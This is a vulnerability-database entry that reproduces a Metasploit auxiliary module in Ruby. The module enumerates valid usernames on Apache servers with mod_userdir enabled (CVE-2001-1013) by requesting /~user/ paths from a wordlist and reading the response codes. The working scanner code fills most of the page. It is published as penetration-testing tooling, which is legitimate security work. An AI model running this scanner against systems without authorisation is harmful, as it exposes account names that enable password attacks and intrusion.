Lucene search
Apache "mod_userdir" User Enumeration
🗓️ 15 Aug 2011 05:55:56Reported by Heyder Andrade <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 504 Views
Apache "mod_userdir" User Enumeration. Apache with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, allowing remote attackers to determine valid usernames on the server
Show more
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2001-1013 | 5 Nov 201509:28 | – | redhatcve |
 | CVE-2001-1013 | 2 Feb 200205:00 | – | cvelist |
 | CVE-2001-1013 | 12 Sep 200104:00 | – | nvd |
 | Apache Mod_userdir User Enumeration | 1 Sep 202400:00 | – | packetstorm |
 | Nmap NSE net: http-userdir-enum | 1 Jun 201100:00 | – | openvas |
| Nmap NSE net: http-vmware-path-vuln | 1 Jun 201100:00 | – | openvas |
| Apache HTTP Server UserDir Sensitive Information Disclosure | 3 Nov 200500:00 | – | openvas |
| Apache UserDir Sensitive Information Disclosure | 3 Nov 200500:00 | – | openvas |
| Nmap NSE net: http-userdir-enum | 1 Jun 201100:00 | – | openvas |
| Nmap NSE 6.01: http-userdir-enum | 28 Feb 201300:00 | – | openvas |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
def initialize
super(
'Name' => 'Apache "mod_userdir" User Enumeration',
'Description' => %q{Apache with the UserDir directive enabled generates different error
codes when a username exists and there is no public_html directory and when the username
does not exist, which could allow remote attackers to determine valid usernames on the
server.},
'Author' =>
[
'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',
],
'References' =>
[
['BID', '3335'],
['CVE', '2001-1013'],
['OSVDB', '637'],
],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]),
])
deregister_options(
'PASSWORD',
'PASS_FILE',
'USERPASS_FILE',
'STOP_ON_SUCCESS',
'BLANK_PASSWORDS',
'USER_AS_PASS'
)
end
def run_host(ip)
@users_found = {}
each_user_pass { |user,pass|
do_login(user)
}
if(@users_found.empty?)
print_status("#{full_uri} - No users found.")
else
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
report_note(
:host => rhost,
:port => rport,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
:type => 'users',
:data => {:users => @users_found.keys.join(", ")}
)
end
end
def do_login(user)
vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
uri = normalize_uri(target_uri.path)
payload = "#{uri}~#{user}/"
begin
res = send_request_cgi!(
{
'method' => 'GET',
'uri' => payload,
'ctype' => 'text/plain'
}, 20)
return unless res
if ((res.code == 403) or (res.code == 200))
print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
@users_found[user] = :reported
else
vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo15 Aug 2011 05:56Current
0.1Low risk
Vulners AI Score0.1
CVSS25
EPSS0.71836